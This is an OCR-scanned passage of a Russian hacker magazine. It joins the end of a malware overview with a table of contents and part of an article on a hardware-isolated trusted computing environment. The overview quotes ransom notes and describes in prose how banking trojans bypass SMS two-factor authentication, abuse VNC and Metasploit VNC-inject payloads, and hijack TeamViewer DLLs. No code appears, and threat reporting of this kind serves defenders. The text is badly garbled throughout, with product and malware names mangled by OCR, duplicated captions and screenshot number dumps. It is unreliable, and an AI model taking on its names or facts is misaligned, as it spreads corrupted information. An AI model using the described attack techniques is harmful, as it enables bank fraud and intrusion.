для подражания была взята логика трояна Мауасііок. 1, который получил ши- 
рокое распространение во второй половине 2011 года. В настоящее время 
в ходу версия Тгоіап.МауасІіок.2, имеющая функции буткита. Характерная 
черта семейства Тгоіап. Мауасііок — использование веб-инжектов. 



ЖАЛКИЕ ПОСЛЕДОВАТЕЛИ СРСООЕ 

Шифровальщики — это, пожалуй, самое неприятное, что мож- 
но подцепить в этих ваших интернетах. Все файлы опреде- 
ленных типов, например фотографии или документы МісгозоТІ: 
ОТТісе, шифруются и за ключ расшифровки требуют деньги. 
Очень актуальна эта проблема для малых коммерческих фирм, 
работающих с бухгалтерией при помощи продуктов 1С, — тем 
более что понятие о безопасности в таких конторах, как прави- 
ло, отсутствует напрочь. 

Наиболее часто встречаются сейчас среди русскоязычных 
пользователей шифровальщики семейства Тгоіап-Вапзот. 
ѴѴіп32. Хогізі: (в терминологии «Лаборатории Касперского»), 
англоязычная версия также в наличии. При успешном срабаты- 
вании Хогізі: пользователь будет лицезреть веселенький текст 
следующего содержания: 

«ПЯТНАДЦАТЬ ЧЕЛОВЕК НА СУНДУК МЕРТВЕЦА! 

Хай! Пиплы! Комон на борт нашего «Летучего голландца». 
Ваш компьютер взят на абордаж командой сомалийских 
пиратов. Ваши файлы зашифрованы нашим морским крип- 
тографом Вазоном Хикса. 

Если вы мудрый и не скряга, не шизанутый депутат 
из фракции ЛДПР, то мы готовы обменять вашу драгоцен- 
ную инфу на жалкие бумажки, именуемые бабками. По- 
верьте, бабло — зло — отдайте его нам. Алчных и неадек- 
ватных типов за борт. Веселым и находчивым скидки. У вас 
три дня до отплытия корабля. Для переговоров собираем- 
ся в кают-компании, 808 на мыло Номер компании <КОД> 
<Е-МАІІ_>» 

Как видно, ребята подобрались с юмором. Засилье Хогізі: объ- 
ясняется сборкой его с помощью билдера, легкодоступного 
жадным детишкам. 

Вот еще один образец послания от вымогателей (Тгоіап. 
Епсосіег.205 и Тгоіап.ЕпсосІег.215): 

Все важные для Вас данные на этом компьютере (докумен- 
ты, изображения, базы данных, почтовая переписка и т. д.) 
зашифрованы с использованием уникального криптогра- 
фического алгоритма. Без специального программного 
обеспечения расшифровка одного файла с использовани- 
ем самых мощных компьютеров займет около года. 

Для того чтобы зашифрованные файлы стали доступны 
для дальнейшего использования, Вам необходимо свя- 
заться со специалистом по етаіі: зресіаІтіз1:@дтаіІ.сот. 
Время ожидания ответа может составлять до 12 часов. 

Переустановка операционной системы не поможет. 
Проверка файлов антивирусом может их повредить. Какое- 
либо изменение структуры файла не позволит его восста- 
новить. При поступлении угроз в наш адрес Ваши данные 
не будут расшифрованы. Обращаем внимание, что файлы 
можно расшифровать только с использованием специаль- 
ного программного обеспечения, которое есть только у нас. 



ГЛОССАРИЙ 



ѴІМС (ѴігіиаІ Ыеіѵѵогк Сотриііпд) — система 
удаленного доступа к рабочему столу компьюте- 
ра, использующая протокол удаленного кадрово- 
го буфера (ПЕВ). По сети с одного компьютера на 
другой передаются нажатия клавиш на клавиату- 
ре и движения мыши и отображается содержи- 
мое экрана. Программа, принимающая ввод 
пользователя, называется сервером, программа, 
отображающая удаленный экран, называется 
клиентом (или ѵіеѵѵег). 

РРВ (гетоіе Ігате Ьи^ег) — протокол при- 
кладного уровня для доступа к графическому 
рабочему столу. Его можно применять для 
графических оконных систем, таких как ѴѴіпсІоѵѵз 



и Х-ѴѴіпсІоѵѵ в *піх-системах. Суть ПРВ — передача 
прямоугольных областей экрана. Для уменьше- 
ния трафика используются различные методы 
определения, какая область экрана обновилась 
и какое сжатие использовать при передаче. 

По умолчанию ѴЫС использует диапазон 
ТСР-портов с 5900 до 5906. Каждый порт связан 
с соответствующим экраном Х-сервера в *піх- 
системах. В ОС ѴѴіпсІоѵѵз используется только 
один порт — 5900. 

Веб-инжект — это технология, позволяющая 
изменить содержимое веб-страницы на стороне 
клиента (в браузере) и добавить туда свой кон- 
тент. Технология базируется на инжекте вредо- 



носного кода в адресное пространство браузеров 
и перехвате всех НТТР-запросов и ответов от 
сервера. Под веб-инжектами также понимают 
файлы, содержащие информацию, для каких 
сайтов, на какой странице, в каком ее месте, 
что нужно поменять. Для кодинга таких файлов 
трояномейкеры нанимают толковых ребят, в со- 
вершенстве владеющих НТМІ_ и 0аѵа8сгірІ, ну или 
пишут сами. При посещении пользователем ин- 
тересующего злоумышленников сайта вредонос- 
ный код вставляет в ответ сервера 0аѵа8сгір1:-код 
(в отдельных случаях отмечалось использование 
библиотеки іОиегу), который и подменяет контент 
исходной страницы, например добавляет на фор- 
му ввода поля, которых изначально там не было. 
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Схема обхода двухфакторной аутентификации 



Заражение Тгоіап.ЕпсосІег.205 и Тгоіап.ЕпсосІег.215 происходит с исполь- 
зованием массовой рассылки сообщений электронной почты (Владимир, это 
ты так спам называешь? — Прим. ред.). Исполняемый файл шифровальщика 
с именем ирсМе.ехе (написан на йеірііі) размещается на удаленных серве- 
рах, шелл-код, который подгружает этот файл, располагается во вредонос- 
ном документе МісгозоТІ: ѴѴогб и использует для своего запуска эксплуатацию 
уязвимости СѴЕ-2012-0158. 

Отдельные разработчики проявляют чуть больше изобретательности 
в реализации своих идей. Специалисты компании Ог.ѴѴеЬ в этом году зафик- 
сировали во Франции и Испании множество случаев заражения пользовате- 
лей трояном АгсЫѵеІ_оск.20. Для шифрования он имеет на борту консольную 
версию ѴѴіпВАВ, при помощи которой создает по заранее составленному 
списку защищенные паролем самораспаковывающиеся архивы с файла- 
ми пользователя. Пароль может иметь длину более 50 символов. Исходные 
файлы зачищаются с диска, чтобы их было невозможно восстановить. Кибер- 
преступники отличаются неслыханной наглостью и требуют за расшифровку 
5000 долларов. АгсІііѵеІ_оск распространяется посредством Ьшіеіюгсе-атак 
на протокол ПОР. 

Для расшифровки ваших бесценных файлов нужно обратиться к спе- 
циалистам антивирусных компаний. Отечественные конторы делают это 
на бесплатной основе и постоянно выпускают обновленные версии дешиф- 
ровальщиков для отдельных видов угроз. К сожалению, некоторые их виды, 
например СРСосІе, оказались им не по зубам. Версия СРСосІе 2011 года мо- 
жет считаться неким «эталоном» шифровальщика, она использует ѴѴіпсІоѵѵз 
Сгурію АРІ и шифрует файлы пользователя случайным сеансовым ключом 
АЕ8 длиной 256 бит. Сеансовый ключ сохраняется в зашифрованном виде, 
шифрование производится открытым ключом П8А длиной 1024 бита, который 
находится внутри СРСосІе. Чтобы невозможно было восстановить их утили- 
тами типа РНоІоНес или СеЮаіаВаск, шифрованные данные пишутся прямо 
в исходный файл. Также эта уловка затрудняет использование метода ріаіп 
Іехі айаск, суть которого заключается в определении сеансового ключа на ос- 
нове пары файлов — исходного и зашифрованного. Для расшифровки необ- 
ходимо перечислить определенную денежную сумму по реквизитам, остав- 
ленным злоумышленником, и переслать ему этот зашифрованный сеансовый 
ключ. Он расшифровывается при помощи закрытого ключа (находится у зло- 
умышленника) и отправляется обратно пользователю, после чего файлы бу- 
дут успешно расшифрованы. Единственная надежная защита от воздействия 
подобных программ — резервное копирование файлов. Стоит отметить, 

Заражение Тхо]ап.Епсодехлоъ и Тго]ап. 
Епсойег.215 происходит с использованием 
массовой рассылки сообщений 
электронной почты 



что автор СРСосІе совершенствовал свое детище аж с 2004 
года! За это время код проделал долгий путь от использования 
«самопальных» алгоритмов шифрования до применения доста- 
точно стойких алгоритмов ВС4 и АЕ8 в совокупности с В8А, ко- 
торые не под силу взломать (пока) всем ІТ-специалистам мира. 
В свете этого становится непонятно, почему шифровальщики 
нашего времени, подобные Хогізі:, тоже используют собствен- 
ные «мегаразработки». Видно, современная криптография вку- 
пе с необходимостью юзать ѴѴіпсІоѵѵз Сгуріо АРІ или фришную 
реализацию криптофункций Ореп88І_ не дается нынешнему по- 
колению кулхацкеров, только открывших для себя логическую 
функцию ХОР. 

АТАКИ НА СИСТЕМ Ы ДБО 

Сама идея троянов, ворующих учетные данные пользователей 
ДБО, не нова. Для противодействия им была придумана тех- 
нология двухфакторной аутентификации. Многие наверняка 
знают, что это такое, а для тех, кто не знает, поясним — кроме 
логина и пароля, используется дополнительный элемент, в ка- 
честве которого выступает специальный код (так называемый 
тТап — тоЬіІе йапзасйоп аиИпепйсайоп питЬег — мобильный 
код аутентификации транзакций), который приходит в 8М8. Од- 
нако методы кражи учетных данных с каждым годом становят- 
ся все изощреннее. Бурное развитие технологий, в частности 
массовое распространение смартфонов, играет на руку зло- 
умышленникам и создает лазейки для обхода двухфакторной 
аутентификации. Первопроходцами в этом деле стали семей- 
ства 2еиз и 8руЕуе. Схема обхода следующая: 

1. Персональный компьютер заражается каким-либо спосо- 
бом — например через РйР- или бос-файл, пришедший 
по почте. 

2. В момент, когда пользователь логинится на сайт банка, тро- 
ян на лету прямо в браузере модифицирует НТМ1_-страницу 
при помощи веб-инжекта и добавляет поля «Номер мо- 
бильного телефона» и «Версия мобильной ОС» (Апбгоіб, 
ВІаскВеггу, І08, 8уплЬіап или другая). 

3. После ввода данных пользователем они отправляются 
на командный сервер злоумышленникам. 

4. Пользователю приходит 8М8 со ссылкой на приложение 
для его телефона. В терминологии антивирусных контор 
приложения получили названия 2И:Мо (2еиз-іп-1:Ііе-МоЬіІе) 
и 8ріШо (8руЕуе-іп-1:Ііе-МоЬіІе), чуть позже к ним присоеди- 
нился СіШо (СагЬегр-іп-іИе-МоЬіІе). 

5. После закрепления на смартфоне у злоумышленников есть 
все необходимое — логин, пароль и канал доставки 8М8 
с кодом, запрос на транзакцию поступает в банк. 

6. Банк высылает 8М8. 

7. Троян в смартфоне скрытно, не показывая пользователю, 
отсылает на командный центр полученный в 8М8 плТап, 
при помощи которого злоумышленники подтверждают 
транзакцию. 

В схеме возможны вариации, например, ссылка на мо- 
бильную версию зловреда может внедряться прямо в страни- 
цу банка в виде ОВ-кода. Также некоторые банки фиксируют 
ІР клиента, и в этом случае транзакция инициируется трояном 
с зараженной машины, которая выступает в качестве свое- 
образного прокси. К слову сказать, двухфакторная аутентифи- 
кация более распространена в Европе, чем в Америке, поэтому 
2И:Мо и 8рііМо в большей степени ориентированы на Евросоюз. 
В противовес этому СіШо, да и сам СагЬегр был ориентирован 
на пользователей из России. 

В качестве одного из последних громких дел с уводом де- 
нежных средств можно вспомнить акцию ЕигодгаЫэег, раскры- 
тую в конце 2012 года. Согласно отчету компаний СНеск Роіпі: 
8оТ1:ѵѵаге Тесііпоіодіез и Ѵегза^е, денежные средства на сум- 
му около 36 миллионов евро были украдены с более 30 тысяч 
корпоративных и частных банковских счетов. В ходе акции 
ЕигодгаЫэег использовалась очередная модификация 2еиз 
на пару с 2іШо. 

Из последних новинок в сфере банковских троянов экс- 
перты отмечают появление весной 2013 года нового варианта 
трояна Согі. Последняя его версия, обнаруженная сотрудни- 
ками компании Тгизіеег, содержит функционал МВР-буткита. 
Компонент, запускаемый буткитом после загрузки операци- 
онной системы, ожидает запуска браузера ІЫегпеІ: Ехріогег 




ІОО 



Маіѵѵаге 
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и внедряет вредоносный код в рабочие процессы браузера, что позволяет 
перехватывать содержимое НТТР-запросов и ответов для последующей мо- 
дификации. 

В качестве более надежной защиты при банковских транзакциях высту- 
пают аппаратные девайсы — токены, которые содержат в себе закрытые 
ключи для реализации технологии электронной цифровой подписи. Однако 
и здесь киберпреступникам есть чем ответить. Достаточно лишь получить 
полный доступ к удаленному рабочему столу ПЭВМ -жертвы. Организуется 
такой доступ, как правило, посредством ѴІМС, благо в Сети полно исходных 
кодов таких серверов, для примера — проекты ШгаѴІМС и ТідЫѴГМС. Кстати, 
именно на основе последнего созданы две полезные нагрузки в Меіазріоіі: — 
\л/іп32_ЬіпсІ_ѵпсіп]ес1: и \л/іп32_геѵегзе_ѵпсіп]ес1:. Эти нагрузки представляют 
собой ЭІ_І_, запускающие на локальной машине ѴІ\ІС-сервер с поддержкой 
прямого (мы коннектимся к атакуемой машине) и обратного (атакуемая ма- 
шина коннектится к нам) соединений. Отдельные виды малвари юзают свою 
собственную реализацию ѴІМС-сервера, например Іеиз и Сііасіеі. 

Кроме ѴІМС, можно попробовать использовать «легитимные» утили- 
ты удаленного администрирования, слегка подрихтовав их напильником. 
Именно так поступают создатели трояна СагЬегр, ориентированного на кра- 
жу банковских реквизитов. Используемые ими продукты: в 2010 году — 
ВеТѵѵіп ТИіпзоИ: Тог ПЭР и ТеаплѴіеѵѵег, в 2011-м — Мірко РегзопаІ Мопііог 
и в 2012-м — АттууАсІтіп. Их исполняемые модули не модифицировались, 
что позволяло сохранить легальную цифровую подпись — на первых порах 
это неплохо сбивало с толку антивирусные продукты. Злоумышленники про- 
сто создавали вредоносную ЭИ с именем одной из импортируемых библи- 
отек, например Т ѵ. сі 1 1 для ТеатѴіеѵѵег, а оригинальную переименовывали (в 
Тз.сІІІ) . Библиотека Тѵ.сІІІ передавала код доступа к компьютеру на управляю- 
щий сервер и служила переходником к Тз.сІІІ, из которой вызывались ориги- 
нальные функции. Все компоненты помещались в самописный инсталлятор 
(дроппер), который сохранял их в каталоге, доступном на запись (Арріісайоп 
Эаіа), и прописывал в автозагрузку. В 2010-м подобные вещи часто делали 
с Петоіе Асітіп, да и теперь на форумах спрашивают иногда, хотя все уже 
на ура палится. Между прочим, данный метод сейчас активно используется 
и в шпионских целях. По результатам анализа Центра глобальных исследо- 
ваний и анализа угроз «Лаборатории Касперского» (СВеАТ), одна из кибер- 
преступных групп, названная ТеаплЗру Сгеѵѵ, провела серию целевых атак, 
направленных против политических деятелей и правозащитников на тер- 
ритории СНГ и восточноевропейских стран, при этом для организации не- 
санкционированного доступа использовалась как раз «зловредная» версия 
ТеатѴіеѵѵег. 

Кстати, в июне исходники известного банковского трояна СагЬегр утекли 
в открытый доступ. Притом что еще за неделю до этого они были выстав- 
лены на продажу за 50 тысяч долларов. Может быть, как и в случае с 2еиз, 
кто-нибудь еще успеет продать исходники СагЬегр какому-нибудь неосве- 
домленному покупателю. В случае с 2еиз подобные истории тогда немало по- 
веселили народ на форумах в первые дни после утечки. 

Исходные коды СагЬегр в ПАП-архиве размером 1 ,88 Гб сейчас легко на- 
ходятся Соодіе. В распакованном виде проект содержит около 5 Гб файлов, 
в том числе: 

• исходный текст буткита, кт драйверов и всего, что работает в кт; 

• билдер дропперов; 

• плагины; 

• веб-инжекты; 

• ЬРЕ-эксплойты. 

Впечатляет список по семействам вредоносных программ, код которых 
представлен в архиве с СагЬегр: 

• сам СагЬегр; 

• ЦгзпіТ; 

• Воѵпіх (ВКЬоасІег); 

• АІигеоп (дроппер старых вариантов); 

• СІауѵѵЬізІ: (ѴІМС); 

• ЬсІеІ; 

• 2еиз; 

• ЗруЕуе; 

• Ѵипсіо; 
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• буткит Зіюпесі с эксплойтом Ѵіріп Киплаг с ВІаск Наі Еигоре 2007, 

определяется какЗіпоѵѵаІ; 

• Музііс Сотргеззог — обфускатор под Ѵ\/іп32. 

Подборка впечатляет. Кому была выгодна такая утечка, пока под 
большим вопросом, но факт остается фактом — исходники доступны 
всем желающим. И огромное количество людей сейчас исследуют их 
со всех сторон. 

Очевидно, теперь можно ожидать новой волны креатива со сто- 
роны как начинающих, так и продолжающих вирусописателей. Кто- 
то даже пошутил: «Утечка 2еиз была как бесплатный автомат. Утечка 
СагЬегр — это уже бесплатный рокет-ланчер». 

ЗАКЛЮЧЕНИЕ 

Как ты мог сам убедиться, вариаций увода денег — огромное множе- 
ство. И к сожалению, полагаться на то, что один антивирус тебя за- 
щитит от этих напастей, не стоит. Помочь тут может только совершен- 
ствование своей компьютерной грамотности. В то же время многие 
пользователи недооценивают данную угрозу. Отчасти это происхо- 
дит из-за смещения фокуса аудитории интернета в сторону тех злов- 
редов, на которых больше всего пиарятся антивирусные компании. 
За примерами далеко ходить не нужно, вот два «топовых» слова — 
Зіихпеі и Веб ОсІюЬег. А банковские трояны — это, по словам одного 
эксперта по безопасности, для России не актуально, у нас, мол, си- 
стемы ДБО мало распространены. ОК, давайте пить боржоми, когда 
почки уже отвалились. Такая вот ориентация на корпоративный уро- 
вень весьма прискорбна. Простому пользователю все эти стакснеты 
и красные октябри ничего плохого не сделали, кто их защитит от дей- 
ствительно актуальных для них угроз? Целевые организации и пред- 
приятия, против которых были направлены Зіихпеі и Веб ОсІоЬег, на- 
против, были сами в состоянии обеспечить свою безопасность. 

Резюме: резервное копирование информации, работа с правами 
пользователя, внимательность при работе с ДБО, постоянное об- 
новление софта из надежных источников и какой-никакой антивирус 
с файрволом «спасут отца русской демократии». Ш-Е 



6 качестве более надежной защиты при банковских транзакциях выступают 
аппаратные девайсы — токены, которые содержат в себе закрытые ключи 
для реализации технологии электронной цифровой подписи . Однако и здесь 
киберпреступникам есть чем ответить 



Ргеѵіе 



ПРИКЛАДНАЯ 

АУДИОФИЛИЯ 



Аудиофилы — своеобразные ребята, и произво- 
дители оборудования охотно этим пользуются. 
Наши юниксоиды столкнулись с прекрасным 
примером лохотрона — «аудиофильский» плеер 
за 150 килобаксов, представляющий собой 
обычный комп с Іпіеі Аіопл, РСІ-звуковухой 
и ОеЬіап. Недолго думая, ребята взяли и сделали 
собственный аналог, который можно собрать 
из почти любого железа и потратить при этом 
значительно меньше денег. 





ЭТОТ БЕЗУМНЫЙ, БЕЗУМНЫЙ ОРЕИ 
$011 ВСЕ 

Мы собрали для тебя самые странные платфор- 
мы для запуска *піх-систем: от тостера до брау- 
зерных эмуляторов І_іпих, ЫеШЗй и других. 



кодинг 




ДОВЕРЕННАЯ СРЕДА 



Рассказ о принципиально новом подходе к вир- 
туализации, позволяющем получить полностью 
контролируемую и безопасную среду. 




кодинг 




ТОРКАЕТ НА ОТЛИЧНО! 



В прошлых номерах мы уже рассказывали 
о графическом движке ІІпіІу, а сейчас поговорим 
о полностью открытом варианте под названием 
Тощие. 
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ПЕЧАТЬ ЗАЩИТЫ 

Обзор продвинутой системы защиты сети ІВМ 
Зесигііу Меіл/ѵогк Іпігизіоп Ргеѵепйоп Зузіепл и ее 
многочисленных функций. 



УНИВЕРСАЛЬНЫЙ СОЛДАТ 

Обзор Випбеск — инструмента автоматизации 
выполнения программ и скриптов для самых 
сложных систем и сетей. 



НАС БЫЛО СЕМЬ 

Не хочешь тратить деньги на коммерческие 
МАЗ’ы? С помощью этих решений и почти любого 
железа ты сможешь собрать свое хранилище. 
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Н-КОНЦЕПТ: 

ДОВЕРЕННАЯ 

СРЕДА 




Как я делал доверенную 
вычислительную среду 
на основе «гипердрайвера» 

Есть люди, которым нечего бояться. 

Но только не нашему читателю! Уверен, 
что среди читателей журнала «Хакер» 
найдутся люди, которые по личным 
или служебным соображениям не могут 
доверять не только своей ОС, но и ОС, 
запущенной под виртуальной машиной. 
Что делать? Есть мысль! Которая, кстати, 
материальна. 




ак сделать «компьютер в компьютере»? Например, можно взять ка- 
кую-нибудь систему виртуализации, типа ѴМѵѵаге, запустить вирту- 
альную машину и получить искомое. 

Но с точки зрения информационной безопасности такое реше- 
ние несостоятельно: этот компьютер будет виртуальным, реально в кремнии 
его не будет, со всеми вытекающими из этого последствиями. А последствия 
самые печальные для безопасности выполнения программ: в этом виртуаль- 
ном компьютере все «как на ладони», корневая ОС «сидит высоко и глядит 
далеко», не спрятаться. 

Нужно, чтобы этот «виртуальный» компьютер был весь абсолютно ре- 
альным, из кремния, и на все 100% контролировался только пользователем. 
Желательно, чтобы он состоял из минимального количества компонентов, 
и тогда его проверка на недекларированные возможности будет сведена 
к минимуму. Кроме того, нужно гарантировать его изоляцию от основного не- 
доверенного оборудования. 

До недавних пор «распилить» реальный компьютер на работоспособные 
части было невозможно, не говоря уже об обеспечении полной независимо- 
сти одной из таких частей, но все течет, все меняется. В настоящее время это 
вполне реально, и эта статья именно о таком «распиле» компьютера и новых 
подходах к концепции безопасных вычислений с использованием выделен- 
ных частей железа. 

КОНЦЕПЦИЯ ДОВЕРЕННЫХВЫЧИСЛЕНИЙ 

Предположим, тебе нужно выполнить на компьютере некую программу так, 
чтобы никто не смог вмешаться в ее работу и, более того, не мог подсмо- 
треть, как и что она делает. Кроме этого, ввод/вывод информации на рабочем 



месте (через клавиатуру, монитор, мышь, съемные носители) во время ра- 
боты этой программы также должен быть надежно защищен. Назовем такой 
вариант абсолютно защищенного выполнения программ режимом «доверен- 
ной среды» (ДС). 

Здесь чрезвычайно важны два положения: во-первых, аппаратура, ис- 
пользуемая в доверенных вычислениях, должна быть полностью проверена. 
Во-вторых, все программы, написанные для работы на этом доверенном обо- 
рудовании, должны быть также полностью проверены либо написаны само- 
стоятельно. 

До недавних пор это было фантастикой: в реальных условиях мы работаем 
на аппаратуре и ОС, которую доверенной назвать нельзя. Кроме того, на лю- 
бом компьютере крутятся сотни программ непонятного происхождения, ко- 
торые с легкостью могут вмешаться в нашу работу. 

ДОВЕРЕННАЯ СРЕДА 

Концептуально для создания ДС достаточно всего лишь щепотки памяти и ку- 
сочка процессора на обычной вычислительной системе, избыточность только 
создает проблемы. Этого уже хватит, чтобы создать свой небольшой дове- 
ренный компьютер, сделать «компьютер в компьютере». 

Но этого мало: в доверенном компьютере, находящемся внутри недове- 
ренной вычислительной системы, должен работать проверенный, а еще луч- 
ше написанный собственноручно монитор (маленькая ОС), обеспечивающий 
работоспособность аппаратуры и приложений, функционирующих на нем. 

Другими словами, доверенная среда состоит из доверенного компьютера 
в компьютере и программного монитора (микроОС), обеспечивающего функ- 
ционирование приложений, требующих приватного выполнения. 
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] [-концепт: доверенная среда 






* Диспетчер задач \Л/іп8оѵѵ5 



Файл Параметры Вид Справка 



Приложения Процессы Службы Быстродействие Сеть Пользователи 



Хронология загрузки ЦП 




Физическая память (МБ) 

Кэшировано 
Доступно 
Свободно 

Память ядра (МБ) 
Выгружаемая 
Невыгружаемая 



3002 

2760 



Система 
Дескрипторов 
Потоков 
Процессов 
Время работы 
Выделено (МБ) 



17548 

1019 

66 

0:00:00:43 
1078 / 7866 



"Ф Монитор ресурсов. . . 



Процессов: 66 Загрузка ЦП: 1% 



Физическая память: 23% 



Файл Параметры Вид Справка 



Приложения [ Процессы ] Службы Быстродействие Сеть | Пользователи 
Загрузка ЦП Хронология загрузки ЦП 





Хронология использования физической памяти 



Физическая память (МБ) 




Система 




Всего 


3924 


Дескрипторов 


17544 


Кэшировано 


280 


Потоков 


1003 


Доступно 


ЗОН 


Процессов 


67 


Свободно 


2758 


Время работы 


0:00:00:53 






Выделено (МБ) 


1056 / 7846 


Память ядра (МБ) 








Выгружаемая 


101 






Невыгружаемая 


52 


■ і 1 Монитор ресурсов . . . 



Процессов: 67 Загрузка ЦП: 2% 



Физическая память: 23% 



Рис. 1 . Откусываем себе памяти и процессора 

Естественно, щепотка памяти и выделенное ядро долж- 
ны быть изолированы от остального оборудования вычисли- 
тельной системы, причем не только программно (этого мало), 
но и аппаратно. Сказано — сделано. Вот как это выглядит в ре- 
альности (рис. 1 ). 

Скриншоты одного и того же компьютера, слева обычная 
машина, справа машина с активированной доверенной средой. 
Разница очевидна, ОС лишилась процессорного ядра и десяти 
мегабайт оперативной памяти. 

Этим фокусам уже лет пять, и ничего нового в этом нет, про- 
сто технология не доходила до коммерческого использования 
и применялась только в исследовательских целях. 

Теперь немного конкретизируем понятия. Изолированное 
ядро процессора — это одно из вычислительных ядер процес- 
сора, на работу которого невозможно повлиять извне, то есть 
никакое оборудование вычислительной установки не должно 
иметь возможности вмешаться в его работу. Вмешаться может 
только выключение питания и кнопка аппаратного сброса (сиг- 
нал Резеі:). 

Соответственно, изолированное адресное пространство 
оперативной памяти должно быть недоступно на чтение и мо- 
дификацию основному оборудованию вычислительной уста- 
новки — процессорным ядрам, работающим под ОС, и внеш- 
ним устройствам. 

Итак, у нас есть личное процессорное ядро и изолирован- 
ная память для его работы, следовательно, на базе этого обо- 
рудования можно уже запускать программный код. Можно на- 
писать для них даже собственную операционную систему, вот 
только нам это ни к чему. Достаточно сотворить небольшой про- 
граммный монитор с минимальным набором поддерживаемых 
функций, только для обеспечения работоспособности и изоля- 
ции приватного ПО пользователя. 

ПОЛЬЗОВАТЕЛЬСКОЕ ПО ДОВЕРЕННОЙ СРЕДЫ 



Возможности программ ДВС не- 
ограниченны, все программные и ап- 
паратные ресурсы вычислительной 
установки к их услугам, нужно только 
уметь этим распорядиться. 

ДОВЕРЕННЫЙ ВВОД/ВЫВОД 

Что это такое 

Для выполнения доверенных вычисле- 
ний сначала нужно предоставить дан- 
ные и быть уверенным в том, что они 
не искажены на этапе ввода, а если 
они конфиденциальны, то еще убе- 
диться в том, что их никто не «подсмо- 
трел». Обработанные в доверенной 
среде данные также нужно выгрузить 
доверенным образом с обеспечением 
их целостности и приватности. То же 
самое требуется обеспечить для визу- 
ализации процесса вычислений и его 
результатов на экране монитора. 

Следовательно, нужно сделать 
доверенным не только процесс обра- 
ботки данных, но и процессы ввода/вывода этих данных, да еще и визуализацию не- 
ких критически важных параметров. Фактически нужно этот доверенный «компьютер 
в компьютере» оснастить собственным доверенным периферийным оборудованием. 

Способы реализации доверенного ввода/вывода 

Существует несколько способов реализации доверенного вывода. Самый очевид- 
ный — это поступить также, как и с процессорным ядром: выделить из аппаратных ре- 
сурсов, используемых ОС, необходимые контроллеры и работать с ними только из до- 
веренной среды. Недостаток этого лобового решения — моделезависимость. Нужно 
писать собственные драйверы для работы с выделенным периферийным оборудова- 
нием, а типов этого оборудования слишком много. 

Более простым способом будет организация «сеансового» захвата любого из не- 
обходимых контроллеров, а чтобы ОС и сторонние программы в это время не «пута- 
лись под ногами», на время этого сеанса все процессорные ядра, принадлежащие ОС, 
нужно останавливать (у нас используется термин «заморозить»). Но опять возникает 
вопрос моделезависимости: каки в первом варианте, нужно писать собственные драй- 
веры под все имеющиеся контроллеры, а это просто нереально. 

Поэтому эффективней использовать комбинированный метод. Штатный драйвер 
ОС инициализирует контроллер до уровня активации буфера обмена данными, и толь- 
ко после активации этого буфера происходит «заморозка» процессоров основной ОС. 
В этом замороженном состоянии контроллер пишет в буфер обмена / читает из него 
через БМІ, процессор доверенной среды контролирует заполнение буфера и, когда 
операция завершается, забирает из негаданные, а после этого «размораживает» про- 
цессоры ОС. 

Последний и самый элегантный способ — это работа на лету, когда с внешним 
устройством работает ОС, ничего не тормозится, не захватывается, но буферы обмена 
данных гарантированно подменяются, и реальная информация из них идет по каналам 
ДС, а не основной ОС. 

Какие методы используются? 

Там, где оборудование хорошо стандартизировано и важна гарантированная надеж- 
ность (обеспечение сетевого доступа, например), применяется метод выделения кон- 
троллеров. 



В доверенной среде желательно предельно минимизировать 
затраты на программирование и выполнять только операции, 
требующие приватности, а весь остальной функционал про- 
грамм — на основном, недоверенном компьютере. 

В ДС должны выполняться только критические секции (с 
точки зрения безопасности) программ, функционирующих 
на основном компьютере, типа процедур шифрования, иденти- 
фикации, контроля за основной ОС (обнаружения вторжений), 
сбора статистики, ведения логов, доверенного ввода/вывода. 
Соответственно, объем программного кода для таких задач не- 
велик, и его можно написать с относительно небольшими тру- 
дозатратами. 

Теперь об ограничениях и возможностях программ дове- 
ренной среды, функционирующих на изолированном процес- 
сорном ядре. Естественно, они должны размещаться в изо- 
лированной области адресного пространства ОП и работать 
без использования каких-либо внешних программных модулей 
типа АРІ, функций ВІ05, вызовов прочего внешнего ПО. 



О КОНЦЕПТЕ 

К сожалению, должен признаться, что термин «компьютер в компьютере» и кон- 
цепцию доверенной вычислительной среды на базе реального компьютера в ком- 
пьютере, о которой идет речь, придумал не я. Автор термина — президент фирмы 
«Информзащита» Петр Ефимов. 

Я только реализовывал ее в конкретных технических решениях, моих силенок 
на всю задачу не хватило бы, работала команда. Причем не только из моих коллег, 
но и из сотрудников отдела перспективных разработок «Кода Безопасности» во гла- 
ве с Максимом Шипиловым. 

Так что и архитектура, и технические решения, реализующие концепцию «ком- 
пьютер в компьютере» для организации ДС, — это плод коллективного труда, и, ког- 
да я буду по привычке писать от первого лица, нужно понимать, что это не вполне 
соответствует действительности. 







Кодинг 
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ОПЕРАТИВНАЯ 
ПАМЯТЬ, АППАРАТНЫЙ 
СБРОС И НЕМНОГО 
ПАРАНОЙИ 

Изолированная для нужд ДС память 
имеет один принципиальный изъян: 
после аппаратного сброса изолиро- 
ванный участок оперативной памяти 
перестанет быть изолированным, 
к нему сможет обращаться любая 
программа на любом процессорном 
ядре. Но информация, хранившаяся 
в нем, останется, и во многих случа- 
ях после аппаратного сброса можно 
получить к ней доступ. Поэтому кри- 
тически важную информацию в изо- 
лированном адресном пространстве 
размещать нельзя, там может нахо- 
диться только программный код ДС, 
локальные переменные и системные 
таблицы. 

Следовательно, хранить секрет- 
ную информацию (ключи шифрования 
как минимум) можно только в реги- 
страх изолированного процессорного 
ядра, поскольку они гарантированно 
обнуляются при выполнении аппарат- 
ного сброса, предшествующего про- 
цедуре перезагрузки системы. 
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Рис. 2. Пример работы гипердрайвера 
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Файл Параметры Вид Справка 

Приложения Процессы Службы Быстродействие сеть Пользователи 
Загрузка ЦП Хронология загрузки ЦП 




Физическая память (МБ) 

Всего 3924 

Кэшировано 308 

Доступно 3024 

Свободно 2746 

Память ядра (МБ) 
Выгружаемая 
Невыгружаемая 



Дескрипторов 16595 

Потоков 881 

Процессов 66 

Время работы 0:00:01:35 

Выделено (МБ) 1040 / 7846 

| 1 •У Монитор ресурсов ... | 



51аг1іпд Метогу Гипсііоп... 



Процессов: 66 Загрузка ЦП: 7% Физическая память: 22% 



Рис. 3. Скриншот участка памяти с включенной ДС 



Там, где нет даже намека на стандартизацию протоколов доступа к обору- 
дованию и полно недокументированных возможностей (пример — современ- 
ные видеоадаптеры), применен метод заморозки ОС на время чтения/записи 
буферов данных. 

В более простых случаях реализуется метод подмены/съема информа- 
ции на лету, к примеру, так реализована работа с клавиатурным вводом. 

ЖИЗНЕННЫЙ ЦИКЛ ДОВЕРЕННОЙ СРЕДЫ 

В нашем мире все имеет начало и все имеет конец, в случае с ДС назовем 
